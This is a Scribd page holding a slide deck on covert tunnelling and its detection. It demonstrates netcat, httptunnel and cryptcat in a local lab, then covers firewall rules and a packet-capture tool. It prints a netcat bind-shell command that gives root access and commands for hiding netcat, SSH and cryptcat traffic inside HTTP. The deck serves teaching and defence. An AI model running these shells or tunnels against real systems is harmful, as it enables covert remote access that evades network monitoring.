Scribd Logo
Importer

Bienvenue sur Scribd !

  • Ccue Janicki Richard

    Transféré par

    Gui Arievilo
    58 vues30 pages
    COVERT tunneling is a technique used by Hackers to hide their tracks. NETCAT is the "swiss Army Knife of TCP / IP" Many uses including backdoors, port scanning, port listening, simple file sharing, and simple chat Integrates well with covert tunneling. Steganography can be used to conceal data in image files such as jpeg.

    Description originale:

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Formats disponibles

    PDF, TXT ou lisez en ligne sur Scribd

    Avez-vous trouvé ce document utile ?

    Ce contenu est-il inapproprié ?

    Signaler ce document
    COVERT tunneling is a technique used by Hackers to hide their tracks. NETCAT is the "swiss Army Knife of TCP / IP" Many uses including backdoors, port scanning, port listening, simple file sharing, and simple chat Integrates well with covert tunneling. Steganography can be used to conceal data in image files such as jpeg.

    Droits d'auteur :

    Attribution Non-Commercial (BY-NC)
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    58 vues30 pages

    Ccue Janicki Richard

    Transféré par

    Gui Arievilo
    COVERT tunneling is a technique used by Hackers to hide their tracks. NETCAT is the "swiss Army Knife of TCP / IP" Many uses including backdoors, port scanning, port listening, simple file sharing, and simple chat Integrates well with covert tunneling. Steganography can be used to conceal data in image files such as jpeg.

    Droits d'auteur :

    Attribution Non-Commercial (BY-NC)
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    sur 30

    COVERT TUNNELING

    Uses and Detection


    Rich Janicki

    WHAT IS COVERT TUNNELING?


    Today covert tunnels are defined as those that
    use entities not normally viewed as data objects,
    but that can be manipulated maliciously to
    transfer information from one subject to
    another[2].
    Some protocols that can be used are HTTP,
    ICMP, DNS, and SSH to name a few
    Steganography can be used to conceal data in
    image files such as jpeg

    WHY IS COVERT TUNNELING IMPORTANT?


    As a Network Administrator, one could use
    covert tunneling for good
    It can provide a safe way to maintenance servers
    It can hide sensitive data from prying eyes
    Allows one to test their network equipment
    designed to prevent the usage of these techniques
    Hackers can use tunneling to hide their tracks
    Malware can use tunneling to receive updates
    and commands, as well as hide activities

    HACKERS USE COVERT TUNNELING?


    As stated earlier malware programs can use
    tunneling to send and receive commands
    Botnets thrive on the ability to use tunneling
    The combinations of these techniques allow the
    botnet operator to remain hidden while
    controlling many computers
    Trojan/Backdoors use common tools, or
    variations of these tools, to allow remote access to
    a compromised system
    Knowing how these tools operate is key to
    defending against them

    DEMONSTRATION OF COVERT TUNNELING

    NETCAT
    The Swiss Army Knife of TCP/IP
    Many uses including backdoors, port scanning,
    port listening, simple file sharing, and simple
    chat
    Integrates well with Covert Tunneling
    Implements easily into programs and scripting

    NETCAT ON TARGET
    ****Netcat*****
    root@bt:~# nc -lp 8000
    hello
    hi
    this is a basic netcat conversation
    ok
    goodbye
    see you later

    NETCAT ON ATTACKER
    ****Netcat Chat****
    rich@netbookremix:~$ nc 192.168.1.121 8000
    hello
    hi
    this is a basic netcat conversation
    ok
    goodbye
    see you later
    ^C

    NETCAT SHELL ON TARGET


    ****Netcat Shell****
    root@bt:~# nc -lp 8000 -e /bin/sh

    NETCAT SHELL ON ATTACKER

    ****Netcat Shell****

    rich@netbookremix:~$ nc 192.168.1.121 8000

    whoami

    root

    ifconfig

    eth0

    Link encap:Ethernet HWaddr 00:0c:76:32:56:61

    inet addr:192.168.1.121 Bcast:192.168.1.255 Mask:255.255.255.0

    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

    RX packets:27 errors:0 dropped:0 overruns:0 frame:0

    TX packets:21 errors:0 dropped:0 overruns:0 carrier:0

    collisions:0 txqueuelen:1000

    RX bytes:2452 (2.4 KB) TX bytes:1855 (1.8 KB)

    Interrupt:23 Base address:0xcc00

    lo

    Link encap:Local Loopback

    inet addr:127.0.0.1 Mask:255.0.0.0

    UP LOOPBACK RUNNING MTU:16436 Metric:1

    RX packets:0 errors:0 dropped:0 overruns:0 frame:0

    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

    collisions:0 txqueuelen:0

    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    HTTPTUNNEL
    ****Netcat over Httptunnel (Target)****
    root@bt:~# hts -F localhost:8000 80
    root@bt:~# nc -lp 8000

    ****Netcat over Httptunnel (Attacker)****


    rich@netbookremix:~$ htc -F 10001
    192.168.1.121:80
    rich@netbookremix:~$ nc 127.0.0.1 10001

    SSH
    ****Normal SSH****
    rich@netbookremix:~$ ssh root@192.168.1.121
    root@192.168.1.121's password:

    BackTrack 4 (PwnSauce) Penetration Testing


    and Auditing Distribution

    Last login: Thu Mar 18 21:57:43 2010


    root@bt:~# whoami
    root

    SSH OVER HTTPTUNNEL

    ****SSH over Httptunnel (Target)****


    root@bt:~# hts -F localhost:22 8081
    ****SSH over Httptunnel (Attacker)****
    rich@netbookremix:~$ htc -F 10003 192.168.1.121:8081
    rich@netbookremix:~$ ssh root@127.0.0.1 -p 10003
    The authenticity of host '[127.0.0.1]:10003 ([127.0.0.1]:10003)' can't be
    established.
    RSA key fingerprint is 62:fb:a9:b3:67:f0:6d:c8:58:f1:1a:01:2c:21:89:73.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '[127.0.0.1]:10003' (RSA) to the list of
    known hosts.
    root@127.0.0.1's password:
    BackTrack 4 (PwnSauce) Penetration Testing and Auditing
    Distribution
    Last login: Thu Mar 18 22:06:26 2010 from 192.168.1.115
    root@bt:~# whoami
    root

    CRYPTCAT
    ****Cryptcat****
    root@bt:~# cryptcat -lp 9000
    hello
    hi
    this conversation is a basic cryptcat conversation
    that means its encrypted right?
    yes sir
    goodbye
    see you later

    CRYPTCAT OVER HTTPTUNNEL


    ****Cryptcat over Httptunnel(As Telnet
    Port)****
    root@bt:~# hts -F localhost:9000 23
    root@bt:~# cryptcat -lp 9000

    ****Cryptcat over Httptunnel(As telnet)****


    rich@netbookremix:~$ htc -F 10004
    192.168.1.121:23
    rich@netbookremix:~$ cryptcat 127.0.0.1 10004

    TOOLS TO DEFEND AGAINST COVERT


    TUNNELING
    Web Tap commercial product
    Open Source firewalls such as IPCop or
    Smoothwall
    Wireshark, Network Miner, or NetWitness
    Snort Intrusion Detection System (IDS)

    FIREWALL RULES
    Prevent unwanted traffic
    Close and stop unnecessary ports and services
    Prevent ACK tunneling by examining the way a
    connection is initialized
    Set connection timeouts
    Enable content filtering
    Use Intrusion Detection Systems
    Use Proxies with Authentication
    Don't allow HTTP-CONNECT queries
    Use Anti-virus and anti-malware programs
    Inspect log files regularly, monitor traffic, a build
    statistics of both [10]

    WIRESHARK

    WIRESHARK

    WIRESHARK

    WIRESHARK

    PCAPDUMP.RB
    Programmed in Ruby
    Uses Ruby pcap, and pcaplet libraries
    Command line tool to ease in viewing pcap files
    To be used on already captured pcap files
    User can see plain text information being sent
    over the network faster
    Tool I created to learn more about pcap files and
    to help understand network protocols
    rich@netbookremix:~/presentation$ ruby
    pcapdump.rb -r alltestshub.pcap

    PCAPDUMP.RB

    ****************pcapdump by Rich Janicki********************

    23:01:30.842629 192.168.1.115:34828 > 192.168.1.121:8000 .AP...

    DATA--->

    ---------------------------------------------------------------

    hello

    23:01:37.310009 192.168.1.121:8000 > 192.168.1.115:34828 .AP...

    DATA--->

    ---------------------------------------------------------------

    hi

    23:01:48.922890 192.168.1.115:34828 > 192.168.1.121:8000 .AP...

    DATA--->

    this is a basic netcat conversation

    ---------------------------------------------------------------

    23:01:55.845469 192.168.1.121:8000 > 192.168.1.115:34828 .AP...

    DATA--->

    ok

    ---------------------------------------------------------------

    23:01:59.603798 192.168.1.115:34828 > 192.168.1.121:8000 .AP...

    DATA--->

    ---------------------------------------------------------------

    goodbye

    23:02:06.518693 192.168.1.121:8000 > 192.168.1.115:34828 .AP...

    DATA--->

    see you later

    PCAPDUMP.RB

    --------------------------------------------------------------23:02:49.115744 192.168.1.115:34829 > 192.168.1.121:8000 .AP...

    DATA---> ifconfig
    --------------------------------------------------------------23:02:49.117790 192.168.1.121:8000 > 192.168.1.115:34829 .AP...

    DATA---> eth0
    Link encap:Ethernet HWaddr 00:0c:76:32:56:61
    inet addr:192.168.1.121 Bcast:192.168.1.255
    Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500
    Metric:1
    RX packets:27 errors:0 dropped:0 overruns:0 frame:0
    TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:2452 (2.4 KB) TX bytes:1855 (1.8 KB)
    Interrupt:23 Base address:0xcc00

    PCAPDUMP CATCHING HTTPTUNNEL

    *--------------------------------------------------------------23:04:33.718566 192.168.1.115:56256 > 192.168.1.121:80 .AP...

    DATA---> GET /index.html?crap=1268967869 HTTP/1.1


    --------------------------------------------------------------23:04:33.719179 192.168.1.115:56256 > 192.168.1.121:80 .AP...

    DATA---> Host: 192.168.1.121:80


    Connection: close
    --------------------------------------------------------------23:04:33.719428 192.168.1.121:80 > 192.168.1.115:56256 .AP...

    DATA---> HTTP/1.1 200 OK


    Content-Length: 102400
    Connection: close
    Pragma: no-cache
    Cache-Control: no-cache, no-store, must-revalidate
    Expires: 0
    Content-Type: text/html

    PCAPDUMP CATCHING HTTPTUNNEL

    --------------------------------------------------------------23:04:35.657512 192.168.1.115:56255 > 192.168.1.121:80


    .AP...

    DATA---> --------------------------------------------------------------23:04:35.657515 192.168.1.115:56255 > 192.168.1.121:80


    .AP...

    DATA---> hello
    --------------------------------------------------------------23:04:38.660736 192.168.1.121:80 > 192.168.1.115:56256
    .AP...

    DATA---> E--------------------------------------------------------------Content-Type: text/html

    CATCHING SSH

    F--------------------------------------------------------------23:06:28.404301 192.168.1.121:22 > 192.168.1.115:54506 .AP...

    DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1


    --------------------------------------------------------------23:06:28.410369 192.168.1.115:54506 > 192.168.1.121:22 .AP...

    DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2


    --------------------------------------------------------------23:06:28.410858 192.168.1.115:54506 > 192.168.1.121:22 .AP...

    DATA---> ^wx?0JJf{~diffie-hellman-group-exchange-sha256,diffiehellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1sshrsa,ssh-dssaes128-cbc,3des-cbc,blowfish-cbc,cast128cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128ctr,aes192-ctr,aes256-ctraes128-cbc,3des-cbc,blowfish-cbc,cast128cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128ctr,aes192-ctr,aes256-ctrihmac-md5,hmac-sha1,umac-64@openssh.com,hmacripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96ihmac-md5,hmacsha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha196,hmac-md5-96none,zlib@openssh.com,zlibnone,zlib@openssh.com,zlib--------------------------------------------------------------

    EXAMPLE SSH PACKET

    23:06:28.411906 192.168.1.115:54506 > 192.168.1.121:22 .AP...

    DATA---> " --------------------------------------------------------------23:06:28.423842 192.168.1.121:22 > 192.168.1.115:54506 .AP...

    DATA--->

    IiL7+ec~x^+

    '+"d{
    w3SX]vj6&Fb?J`[
    G&Q
    sUceL
    Be rA('\ --------------------------------------------------------------

    EXAMPLE CRYPTCAT PACKET

    F--------------------------------------------------------------23:12:36.584469 192.168.1.115:57305 > 192.168.1.121:9000 .AP...

    DATA---> QJmQk,N-------------------------------------------------------------23:12:36.584479 192.168.1.115:57305 > 192.168.1.121:9000 .AP...

    DATA---> <3e*7(GS&K 0H-------------------------------------------------------------23:12:43.066816 192.168.1.121:9000 > 192.168.1.115:57305 .AP...

    DATA--->

    >9M-------------------------------------------------------------23:12:43.066825 192.168.1.121:9000 > 192.168.1.115:57305 .AP...

    DATA--->
    3f_8=M--------------------------------------------------------------

    CONCLUSION
    Some things to think about
    These tests were performed on a local network
    They can be expanded to simulate an attack on a
    large network
    Pcap files can get very large, very quickly
    Dont run Wireshark for extended periods of time
    All of the tests were captured in about 15
    minutes using one pcap file
    Using pcapdump to save the output to a text file
    (in this case) creates a fairly large file

    Vous aimerez peut-être aussi